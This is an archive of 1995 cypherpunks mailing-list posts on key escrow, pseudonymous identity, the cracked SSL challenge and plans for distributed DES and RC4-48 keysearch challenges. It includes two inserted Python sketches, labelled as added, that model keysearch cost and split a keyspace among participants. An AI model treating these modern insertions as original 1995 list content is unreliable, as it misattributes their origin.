around the key escrow scheme when they want it.  Better yet, NSA
can tell the FBI and BATF and such agencies where to find the
technical papers on how to build one, without releasing any
highly-classified information--those agencies can hire someone to
build them one.  This also keeps NSA from having to dirty its hands
with law-enforcement surveillance.

Of course, it will be interesting to see whether pressure is
applied to keep people from offering "nonstandard" ciphers,
especially things like Blowfish and SEAL, which have key scheduling
algorithms that need a lot of memory and time. It's really only
practical to build keysearch machines for very commonly used
ciphers, and even then, it may be complicated. (For example,
imagine a DES variant whose key schedule required several
exponentiations modulo some 1024-bit prime.)

>- -- Lucky Green <mailto:shamrock@netcom.com>
>   PGP encrypted mail preferred.

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDgfl0Hx57Ag8goBAQFa0gP/azECjB06onhSYTvLjkM2I7y2tOpC2BaB
RACVMQn+Z5kVGaDM47eIM1TlRnIMlnEucuLryvqR3fMDCt6g90oDXe3rziWJedbH
PxXYqgkPu1MmRfep+JWrtQ4wWsXxbPa10spTDFa8vKlGDcoohWU0W5ypgr454tlh
KKPaC345vqQ=
=td/F
-----END PGP SIGNATURE-----
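
[Added example, not part of John Kelsey's post or of any code from the list: a Python sketch of the cost argument in the message above, timing a cheap key setup against one built from modular exponentiations and converting the slowdown into equivalent key bits. The SHA-256 stand-in for a fast key schedule, the constructed 1024-bit modulus (not claimed prime), the function names and the 1e9 trials/second rate are all assumptions.]

```python
"""Keysearch cost: longer keys vs. a deliberately slow key setup."""
import hashlib
import math
import time

SECONDS_PER_YEAR = 365.25 * 24 * 3600

# Constructed 1024-bit odd modulus, used for timing only. It is NOT claimed
# to be prime; the cost of modular exponentiation depends on operand size.
MODULUS = (
    int.from_bytes(hashlib.shake_256(b"constructed modulus").digest(128), "big")
    | (1 << 1023)
    | 1
)


def cheap_key_setup(key: bytes) -> bytes:
    """Stand-in for a fast key schedule (one hash call; this is not DES)."""
    return hashlib.sha256(key).digest()


def costly_key_setup(key: bytes, rounds: int = 3) -> bytes:
    """Key setup built from `rounds` exponentiations modulo MODULUS."""
    x = 2
    for i in range(rounds):
        # A full-width exponent derived from the key forces the full cost.
        exponent = int.from_bytes(
            hashlib.shake_256(key + bytes([i])).digest(128), "big"
        )
        x = pow(x + 2, exponent, MODULUS)
    return hashlib.sha256(x.to_bytes(128, "big")).digest()


def seconds_per_call(setup, samples: int) -> float:
    """Average wall-clock seconds for one key setup over `samples` keys."""
    keys = [i.to_bytes(8, "big") for i in range(samples)]
    start = time.perf_counter()
    for key in keys:
        setup(key)
    return (time.perf_counter() - start) / samples


def measure_cost_ratio(samples: int = 50) -> float:
    """How many times slower the costly setup is than the cheap one."""
    cheap = seconds_per_call(cheap_key_setup, samples * 200)
    costly = seconds_per_call(costly_key_setup, samples)
    return costly / max(cheap, 1e-12)


def equivalent_key_bits(key_bits: int, cost_ratio: float) -> float:
    """Key length of a cheap-setup cipher that costs as much to search."""
    return key_bits + math.log2(cost_ratio)


def expected_search_years(key_bits: int, trials_per_second: float,
                          cost_ratio: float = 1.0) -> float:
    """Expected years to find a key, sweeping half the keyspace on average.

    Assumes per-trial cost is dominated by key setup, so a setup that is
    `cost_ratio` times slower divides the machine's trial rate by that factor.
    """
    expected_trials = 2 ** (key_bits - 1)
    return expected_trials * cost_ratio / trials_per_second / SECONDS_PER_YEAR


if __name__ == "__main__":
    rate = 1e9  # assumed trials/second with the cheap setup
    ratio = measure_cost_ratio()
    print(f"costly setup is ~{ratio:,.0f}x slower "
          f"(worth ~{math.log2(ratio):.1f} extra key bits)")
    for bits in (56, 64, 128):  # DES, the 64-bit limit discussed, IDEA
        print(f"{bits:3d}-bit key: cheap setup "
              f"{expected_search_years(bits, rate):.3g} years, "
              f"costly setup {expected_search_years(bits, rate, ratio):.3g} "
              f"years (like {equivalent_key_bits(bits, ratio):.1f} bits)")
```

[A slow key setup adds only log2(slowdown) bits of search cost, while each extra key bit doubles it, so the costly schedule raises the price of a keysearch machine without replacing a longer key.]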




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 21 Aug 95 20:39:23 PDT
To: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Subject: Re: signing keys for nyms
Message-ID: <199508220335.UAA17520@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:46 PM 8/21/95 -0600, Bryce Wilcox wrote:
>Look, I don't have a lot of time here, but I need to say that this whole
>"certifying anonymous keys" idea is misled.  The fact is, *I* *don't* *care*
>what your True Name is.
>
>I can only think of two reasons why you would need a person's True Name,
>and I doubt that anybody here can apply either of these reasons to anyone 
>else here.
>
>Reason Number Uno, why you might want a person's True Name:
>
>Because you want to physically hurt them, or effectively threaten to hurt
>them.  (Or send someone else to do it, like a hit man, policeman, etc.)
>
>Reason Number Dos, why you might want a person's True Name:
>Because you want to have sex with them.  (Or as above, if you prefer to do it
>through proxies...)
>
>Zimmermann et al. were/are naive to emphasize the Web of Trust as a means of
>introducing strangers.  With very few exceptions, strangers don't *need*
>to verify each other's physical identities!  This fact is central to some of
>the more interesting social evolutions that information technology promises
>to cause.  In retrospect, the emphasis in "pgpdoc1.txt" on verifying True
>Names via mutually trusted introducers will seem quaint.

Reason number 0 why you'd want someone's True Nym -
Because you've met them in person, or are a friend of a friend,
and want to make sure that the key you think is for Mr. X
isn't really the key for an imposter - if you've done Lefty Politics
over the last few decades, this is not unrealistic.
COINTELPRO may have been unreal and UnAmerican, but it happened.

Now, trusting people based on mutually trusted introducers may have
seemed quaint back in the 60s, and it certainly wasn't foolproof,
and planting the suspicion that someone _might_ be a cop was almost
as destructive as if they actually _were_ a cop.  But it's what there was.
(Ok, you had some extra sources of information, like whether the person
actually paid all their organization dues (COP!) or smoked dope with you
(and inhaled) or started advocating unreasonable violence (probable cop)...)

That doesn't mean you checked government-issue ID from people or necessarily
even used True Names; you could be dealing with people in person who
you only knew as "Bill from Delaware" or "Bear" or "Jeanie from the Sierra Club",
but at least if you only trust keys from introducers who know people in person,
you're limiting your electronic conspiracy to people you would have conspired
with in person as well.  (Now, _I_ never bought drugs from Bear, and at this
point I don't even remember his True Name - but I didn't turn him in, either...)
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 21 Aug 95 17:44:34 PDT
To: cypherpunks@toad.com
Subject: NEXT CHALLENGE: plan of action?
Message-ID: <9508220043.AA25405@all.net>
MIME-Version: 1.0
Content-Type: text


I would like to offer all.net as a repository for the sources and executables for
all platforms.  We can put them in the gopher server for all to access.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank Knobbe" <FKnobbe@ix.netcom.com>
Date: Mon, 21 Aug 95 18:56:09 PDT
To: cypherpunks@toad.com
Subject: Crack some code...
Message-ID: <199508220153.SAA17152@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Howdy folks.

Who would be willing to try to crack a code that I implemented in one 
of my programs? The file is a simple index file containing ASCII 
characters besides pointers.  If someone is interested in cracking 
that algorithm, simply send me a mail.  I'm curious of how good that 
algorithm is...

Greetings from Tennessee,
Frank

-----------------------------------------------------------------------------
Frank Knobbe:  FKnobbe@ix.netcom.com (preferred),  Frank@TechEx.com
PGP 1024/26639025 fingerprint=7A EA FF 87 BF EA 00 CD 83 B1 89 81 7E D2 69 96
http://www.techex.com/~frank/home.html  (<- Under Construction!)
IPhone:  Elwood@iphone.vocaltec.com, Ch: Tennessee
-----------------------------------------------------------------------------
Signature Space for Rent!  Imagine your signature here.
For more info contact:  Don@twr.ite.us




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Mon, 21 Aug 95 12:02:37 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape security
Message-ID: <9508211902.AA19391@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


>From: altitude@cic.net (Alex Tang)
>It seems that one of the problems with Damien's
>cracking job was that it  was "not sanctioned".

Actually, INRIA's PR people are quite pleased with the publicity.
They asked me to prepare an official press release to counteract the
Wall Street Journal's "evil hacker" story, which was unfortunately
reprinted by some papers.  The Herald Tribune is particularly bad in
this respect.

If some media insist on this "evil hacker" thing, they will look
more ridiculous than anything else (I hope).

The press release will be out as soon as it gets through the red tape
(the official opinion of a French administration is not something to
be taken lightly, even though it's mostly facts :-)  I'll put it on my
web page when it's official (which is likely to be too late).

-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Mon, 21 Aug 95 12:14:34 PDT
To: cypherpunks@toad.com
Subject: Re:  Liability for Key Cracking in Idle Hours?
Message-ID: <9508211914.AA19431@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


>Damien may be able to tell us if Ecole Polytechnique has raised any
>questions about his highly-publicized attack on the SSL Challenge key.

Well, I asked for permission before I used the machines, so I don't
expect any problem.  (Actually, I asked for the permission, then
launched the processes, then got the permission, but it doesn't make
any difference, does it ?  I should have also asked permission for
putting their name in my announce, though.)

It seems that the Herald Tribune called them about a cracker, and they
refused to comment.  They must have gone in paranoid mode, because
they've had lots of trouble with student crackers in the past, and
there is currently not even one student on the campus.  But now, the
situation seems to be in control, although I had no official contact
from Ecole Polytechnique.

Ecole Normale Superieure did not react at all.  They're all on
vacation anyway.

By the way, "cypherpunks" keep getting mentioned in interviews with
the press.  I hope that's OK with you all.

-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 21 Aug 95 18:42:34 PDT
To: cypherpunks@toad.com
Subject: Newsweek on PGPfone
Message-ID: <199508220142.VAA16607@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Newsweek, August 28, 1995, p. 10.


   Encryption: Pretty Good Phone Privacy

      [Photo] 'This is what I do': Cryptomaster Zimmermann


   In the wake of reports that the Clinton Administration is
   considering another Clipper-like scheme to ensure
   government access to encrypted conversations and e-mail,
   Phil Zimmermann is striking again. The 41-year-old author
   of the notorious PGP (Pretty Good Privacy) software program
   that scrambles e-mail so snoops can't read it is about to
   release a sequel: PGPfone, which allows people to use their
   computers as secure telephones. If you have a recent
   Macintosh (a Windows version comes next month) and a fast
   modem, you and a friend can speak in total privacy. As with
   its predecessor, Zimmermann is giving the software away,
   via MIT's Internet sites. Meanwhile, he's still waiting to
   hear whether the Feds will indict him for export violations
   in the distribution of PGP. Does Zimmermann worry that
   releasing PGPfone -- which can theoretically frustrate law-
   enforcement wiretaps -- will further inflame those who wish
   him arrested? "I'm a cryptographer, " he says. "This is
   what I do."

   [End]











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Mon, 21 Aug 95 18:48:55 PDT
To: Ted_Anderson@transarc.com
Subject: Re: Partial Key Escrow
In-Reply-To: <ckCAut70BwwM80o3IB@transarc.com>
Message-ID: <Pine.PMDF.3.91.950821214634.620943633A-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


A disadvantage of this ingenious proposal is that it makes it
even more difficult to spot rogue key-cracking efforts.  If you are an
honest government employee and you come across a key cracking program
today, and you work for a domestic TLA you know something funny is going
on.  "Just routine" will be the line henceforth...

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Mon, 21 Aug 95 20:41:01 PDT
To: CYPHERPUNKS@toad.com
Subject: Divide and Conquer
Message-ID: <8AF9533.0003000356.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


O > As you may have surmised Hal has given us another challenge to satisfy
O > the people who want to do a challenge to see *how fast* they can do it
O > by involving as many people and their computers as possible.

  Here's a thought or twelve: Precompute the division-of-keyspace
problem, in advance of the actual issue of challenge. Use whatever
criteria of estimating spare mips (idle_percentage * mips_rate) and
allocating slices, then issue each participant a [start..end] space
(and a direction flag. More on this later).

  That way, when the challenge is issued, there is no fumbling about,
but rather a simple: "Gentlemen, start your programs."

  Divide the participants into two roughly equal groups of total spare
mips, so as to address reliability and trust issues. Then allocate the
entire keyspace twice.

  Later...

  For more fun, if the cracker can be coded to read a direction flag
from the config file, so that the main loop can go ++ or --, the
lists of keyspace could alternate thusly:

       Red Team   Blue Team

        0000++     0000++
        --iiii     --jjjj         This method of allocating keyspace
        iiii++     jjjj++       puts the key in the space of 4
        --kkkk     --mmmm       different people at once, but only
        kkkk++     mmmm++       increases average search time by a
              . . .             factor of 2 to protect against holes.
      / --0000     --0000       since the direction flag is independent of
    / \ (FFFF--)   (FFFF--)     team, it reveals nothing to a Bad Guy.
  /
 Two ways of saying the same thing.

  In effect, the ranges computed by the allocator are paired up, and the
two people who share the range play "meet in the middle". If there are n
participants in the group, and b of them are Bad Guys, the probability of
failure would be roughly (b/n)**4.



 * On a clear disk you can seek forever
---
 * Monster@FAmend.Com *    
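
The allocation scheme in the post above, worked through as an added example (not code from the post or from any challenge effort). The participant names, rates and the 16-bit keyspace are constructed, and treating b bad participants as drawn at random from all n across both teams is an assumption made here.

```python
from dataclasses import dataclass
from math import comb


@dataclass(frozen=True)
class Slice:
    who: str    # participant (constructed sample names below)
    team: str   # "red" or "blue"; each team covers the whole keyspace once
    start: int  # first key of the shared range, inclusive
    end: int    # last key of the shared range, inclusive
    step: int   # direction flag: +1 sweeps up from start, -1 down from end
    rate: int   # estimated spare keys/second (idle_percentage * mips_rate)


def allocate_team(team, rates, keyspace):
    """Cover [0, keyspace) once. Participants are paired; each pair shares one
    range sized by its combined rate, one member sweeping ++ and the other --."""
    names = sorted(rates)
    if len(names) % 2:
        raise ValueError("pairing needs an even number of participants")
    total, done, start, slices = sum(rates.values()), 0, 0, []
    for i in range(0, len(names), 2):
        up, down = names[i], names[i + 1]
        done += rates[up] + rates[down]
        # cumulative rounding, so the last range ends exactly at keyspace - 1
        end = keyspace * done // total - 1
        slices.append(Slice(up, team, start, end, +1, rates[up]))
        slices.append(Slice(down, team, start, end, -1, rates[down]))
        start = end + 1
    return slices


def allocate(red, blue, keyspace):
    """Allocate the entire keyspace twice, once per team."""
    return (allocate_team("red", red, keyspace)
            + allocate_team("blue", blue, keyspace))


def covering(slices, key):
    """Everyone whose range contains key: two per team, four in all."""
    return [s for s in slices if s.start <= key <= s.end]


def seconds_to_reach(s, key):
    """Time for one participant to reach key, sweeping in its own direction
    and carrying on past the midpoint if its partner never reports."""
    tested = key - s.start if s.step > 0 else s.end - key
    return (tested + 1) / s.rate


def time_to_find(slices, key, bad=frozenset()):
    """Seconds until an honest participant tests key, or None when all four
    participants covering it are in `bad` (a hole in the search)."""
    times = [seconds_to_reach(s, key) for s in covering(slices, key)
             if s.who not in bad]
    return min(times) if times else None


def miss_probability(n, b, copies=4):
    """Exact chance that all `copies` participants covering a key fall among
    b bad ones drawn at random from n; the post's rough figure is (b/n)**4."""
    return comb(n - copies, b - copies) / comb(n, b) if b >= copies else 0.0


# Constructed sample: a 16-bit keyspace and two teams of equal total rate.
KEYSPACE = 2 ** 16
RED = {"alice": 300, "bob": 100, "carol": 200, "dave": 200}
BLUE = {"erin": 100, "frank": 100, "grace": 300, "heidi": 300}
SLICES = allocate(RED, BLUE, KEYSPACE)

if __name__ == "__main__":
    for s in SLICES:
        flag = "++" if s.step > 0 else "--"
        print(f"{s.team:4} {s.who:5} {s.start:04X}..{s.end:04X} {flag}")
    key = 20000
    print(time_to_find(SLICES, key))
    print(time_to_find(SLICES, key, bad={"alice", "grace", "heidi"}))
    print(time_to_find(SLICES, key, bad={"alice", "bob", "grace", "heidi"}))
    print(miss_probability(1000, 100), (100 / 1000) ** 4)
```

Because the two teams' range boundaries differ, a silent participant delays the key's discovery rather than hiding it, unless all four holders of that key are silent.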




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sw@tiac.net (Steve Witham)
Date: Mon, 21 Aug 95 20:07:52 PDT
To: cypherpunks@toad.com
Subject: Eric Hughes?
Message-ID: <199508220307.XAA29459@zork.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Eric Hughes, if you're listening, please send me a note so I can update
my address file.  I don't receive cypherpunks right now.

 --Steve Witham <sw@tiac.net>


:o)-:
  -







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 21 Aug 95 21:56:58 PDT
To: cypherpunks@toad.com
Subject: Re: Third World Man
Message-ID: <ac5eb0d5120210041887@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:46 AM 8/22/95, Jon Lasser wrote:
>On Mon, 21 Aug 1995, Peter Trei wrote:
>
>> > The US is slipping into the second world as we
>> > speak, with no signs of a turnaround ahead.  Only the sheer size of
>> > the economy keeps people from believing it.
>>
>> Just a nomenclature peeve - I'm not sure of the precise time and
>> place the (first|second|third) world meme originated, but it seems to
>> predate 1970, and until very recently its meaning was clear:
>>
>> First world: Western (and Westernized) nations - mainly the US, Canada,
>> Western Europe, Japan, Australia, & New Zealand
>>
>> Second world: Communist bloc (I can still remember the Cultural
>> Revolution. Prior to that, the Communists seemed a monolithic force,
>> marching in lockstep.)
>>
>> Third world: The rest, mostly poor nations.
>
>Erm, nope.  The "First World" (or old world) was Europe and Asia; the "New
>World" (not frequently referred to as the second world, but hey...)  The
>third world was the developing nations.  THAT (as far as I was taught in
>history class, so it MIGHT be a lie...) was how the terms originated...

Then you should sue your history teacher for giving you a defective
education :-}. Perhaps she or he was of my generation and was at Woodstock
when she should've been doing her homework.

By convention, the First World is the set of "Western" nations, the
democratic, capitalist nations. The Second World, though not often used as
a term, is the set of Communist bloc nations. The Third World, by far the
most commonly used term here, is the set of nations not formally affiliated
with either the First or Second Worlds. These nations are often poor,
though not necessarily poor, and so the "Third World" is often
(incorrectly) associated with poverty. And, to confuse things further, the
"lesser-developed countries," or LDCs, are often equated to the Third
World.

When a certain character in a television show referred to "Third World
mutants," he was also referring to "your basic brown types." (His words,
not mine. Ten credits to anyone who can identify the t.v. show and the
character.)

The term "Fourth World" has in the last 20 years come to refer to the
countries which are so impoverished as to be almost hopeless. Bangla Desh
is the canonical Fourth World nation.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 21 Aug 95 20:14:13 PDT
To: cypherpunks@toad.com
Subject: DES & RC4-48 Challenges
Message-ID: <9508220313.AA20225@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Hello all,

	Let's face it the real challenge is DES, but those 56 bits are quite a 
bit harder than 40. 65536 times harder in fact.

	But if people broke 48 bits then maybe they might start to see 56 as 
being in reach. After all everyone wants to be in for the biggie.

	So before the NSA fobs us off with 48 bits can we crack it? Wind up the 
40 bit code a tad and set to work. It sounds as if it is comparable to the 
RSA-129 prime that was cracked (OK it's probably a touch harder but machines are 
faster now).

	So who wants to make an RC-48 and a DES challenge?

		Phill.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 21 Aug 95 23:01:48 PDT
To: cypherpunks@toad.com
Subject: True Names and Webs of Trust
Message-ID: <ac5ebdaa140210041c80@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Just a comment on this business of whether we need certification of the
True Names of people we deal with:

I've dealt with "in person" maybe 60 to 100 of the people on this list (at
one time or another). In no cases--not a single one--have I made elaborate
checks to confirm that people are who they claim to be. A few driver's
licenses have been flashed at meetings, but I didn't look closely. Maybe a
passport was even displayed, but, again, I didn't look. And documents are
readily forged.

This has relevance to the thread Michael Froomkin raised, as well. To wit,
none of the people I've met has been "certified." And yet it doesn't bother
me.

As Bill Stewart correctly claimed is my view, the "key is the identity."
Or, more accurately, a _persistent persona_ is what matters.

Thus, I don't need to "verify" that "Eric Hughes" is "really" Eric Hughes,
and is not actually Fritz Doppelganger, assigned to Berkeley by the BND. I
really don't care about the so-called "reality."

(Sorry for all of the "quotes," but all of these terms are heavily laden
with connotations which bear deconstructing.)

My experiences are the norm, I think. Identity credentials are rarely
checked, and most people don't care too much. (An important point is that
in a cash economy, identity is almost irrelevant. It's only in non-cash, or
"account-based," economy that True Names are demanded. Lots of interesting
issues to discuss here, which I won't now.)

The "web of trust" model is really the normal way people go about their
business. I knew someone once introduced to me as "Hugh Daniel," and he
eventually introduced me to someone calling himself "Eric Hughes," and so
on. Introducers, webs of trust, etc. What their "real names" are makes
little difference. (Besides, their Real Names were written on flat stones
on the 3rd day after their births and placed in a safe place known only to
the Great Bird.)

I never use the web of trust model in PGP. I get so few PGP messages that
it's enough that people I know give me their keys. So I concede that the
web of trust model in the PGP world may or may not scale well. (In the
sense of tens of thousands of folks establishing a "web of trust.") But the
_basic_ idea of self-arranged transfers of keys and local networks of
friends is right on.

This is why I don't worry too much about the need for
government-authenticated keys and True Names.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Mon, 21 Aug 95 20:51:12 PDT
To: Peter Trei <trei@process.com>
Subject: Re: Third World Man
In-Reply-To: <9508211648.AA17528@toad.com>
Message-ID: <Pine.SUN.3.91.950821234411.20040A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 21 Aug 1995, Peter Trei wrote:

> > The US is slipping into the second world as we
> > speak, with no signs of a turnaround ahead.  Only the sheer size of
> > the economy keeps people from believing it. 
> 
> Just a nomenclature peeve - I'm not sure of the precise time and 
> place the (first|second|third) world meme originated, but it seems to
> predate 1970, and until very recently its meaning was clear:
> 
> First world: Western (and Westernized) nations - mainly the US, Canada, Western Europe, 
> Japan, Australia, & New Zealand
> 
> Second world: Communist bloc (I can still remember the Cultural 
> Revolution. Prior to that, the Communists seemed a monolithic force, 
> marching in lockstep.)
> 
> Third world: The rest, mostly poor nations. 

Erm, nope.  The "First World" (or old world) was Europe and Asia; the "New 
World" (not frequently referred to as the second world, but hey...)  The 
third world was the developing nations.  THAT (as far as I was taught in 
history class, so it MIGHT be a lie...) was how the terms originated...

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 21 Aug 95 23:24:07 PDT
To: cypherpunks@toad.com
Subject: Re: DES & RC4-48 Challenges
Message-ID: <ac5ec2a81502100448c1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:29 AM 8/22/95, hallam@w3.org wrote:

>I think we can probably do DES within two years.
>
>        Phill

I strongly doubt it, and may be willing to bet money against it happening.
(If "we" means someone or some group on this mailing list. If "we" means
the Net, I still doubt it will happen.)

If the "idea futures" and betting markets we've talked about here (which
exist) ever take off, this may be a way to make some money for someone. For
example, if someone was laying 10:1 odds that SSL would not be cracked in
1995....

And for the "do DES" bet, you need to differentiate (no pun intended)
between a chosen plaintext attack and a more general attack. The
differential cryptanalysis ("DC" gets another overload) method needs chosen
plaintext to cut the search space down to 2^47 keys.

Wiener's hypothesized "million dollar DES cracker" may do the general
attack, but I doubt anyone on our mailing list will do it. That is, the
number of workstations and even supercomputers which would have to be
lashed-together would be, ballpark, about 2^16 times greater than what was
lashed-together for the SSL challenge. Maybe a factor of ten could be cut
out with increased cleverness. Maybe.

Call it a factor of "only" 6000 times harder than the SSL challenge. Hard
to imagine this happening in the next two years.

Maybe if much of the Net community was energized to run DES crackers
instead of Flying Toasters, but a hard effort to organize...for fleeting
reward.

--Tim May



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Mon, 21 Aug 95 21:21:25 PDT
To: cypherpunks@toad.com
Subject: Re: your mail
Message-ID: <199508220417.AAA29302@interport.net>
MIME-Version: 1.0
Content-Type: text/plain


> Thanks again, and I hope you go ahead and start PGP-clearsigning your posts
> so that my high opinion of you can become more firmly fixed.


> :-)


> Regards,

> Bryce

  If I don't PGP-sign my message, you can't prove I sent it.

  But if you don't put your name and e-mail address at the
bottom of your message, I don't even know who you are!  (Your
message was hit by the "three screens of Apparently-To: headers"
bug, and the From: line says "owner-cypherpunks@toad.com".  The
Subject: line also got lost.)

  Let's get the basics straight first, okay?  This has been part
of netiquette since before there was a net!


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Mon, 21 Aug 95 21:43:33 PDT
To: dan@milliways.org (Dan Bailey)
Subject: Re: DES & RC4-48 Challenges
In-Reply-To: <199508220411.AA13217@ibm.net>
Message-ID: <9508220443.AA03977@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Dan wrote:

|Not having my copy of The Differential Cryptanalysis of the Data
|Encryption Standard handy, I'd like to know about the distributability
|of this type of DES attack.  Done right, we could significantly reduce
|the time complexity.
|	The main problem, of course, would be coordinating such an effort.  I
|seem to recall this attack requiring lots of known plaintexts.  Time
|to review the text, I suppose....
|	Does the Federal Reserve still use single-key DES?

The forms of differential cryptanalysis that I'm aware of require the
cracker to adaptively attack the encrypting or decrypting device. I
therefore do not believe that they are especially applicable to
financial transactions schemes, most of which change keys quite
frequently.

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Mon, 21 Aug 95 21:12:15 PDT
To: hallam@w3.org
Subject: Re: DES & RC4-48 Challenges
Message-ID: <199508220411.AA13217@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 21 Aug 95 23:13:06 -0400 you wrote:

>
>Hello all,
>
>	Let's face it the real challenge is DES, but those 56 bits are quite a 
>bit harder than 40. 65536 times harder in fact.
>
>40 bit code a tad and set to work. It sounds as if it is comparable to the 
>RSA-129 prime that was cracked (OK it's probably a touch harder but machines are 
>faster now).
>
>	So who wants to make an RC-48 and a DES challenge?

Not having my copy of The Differential Cryptanalysis of the Data
Encryption Standard handy, I'd like to know about the distributability
of this type of DES attack.  Done right, we could significantly reduce
the time complexity.
	The main problem, of course, would be coordinating such an effort.  I
seem to recall this attack requiring lots of known plaintexts.  Time
to review the text, I suppose....
	Does the Federal Reserve still use single-key DES?
						Dan  
******************************************************************************
"I think, therefore I am" - Descartes                            Dan Bailey
"I don't think, therefore I'm a moustache." - Sartre		    dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
******************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 21 Aug 95 22:30:28 PDT
To: dan@milliways.org (Dan Bailey)
Subject: Re: DES & RC4-48 Challenges
In-Reply-To: <199508220411.AA13217@ibm.net>
Message-ID: <9508220529.AA20429@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



I don't think the differential Cryptanalysis attack helps very much. You
need a somewhat improbable quantity of chosen plaintext to attempt it.

You would get further with a direct attack I suspect. In any case let's do 
RC4-48 or RC4-44 first as proof of ability.


Another idea, let's crack CDMF, IBM's weakened key DES.

After DES the only other crack of interest that's in range is the meet in the 
middle attack on two key DES. Clipper looks a bit off in the distance still.
(We will get it one day, probably not until 2010 though).

I think we can probably do DES within two years.

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Mon, 21 Aug 95 17:38:28 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Re: Basically F-C-ed
Message-ID: <199508220038.AA10242@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


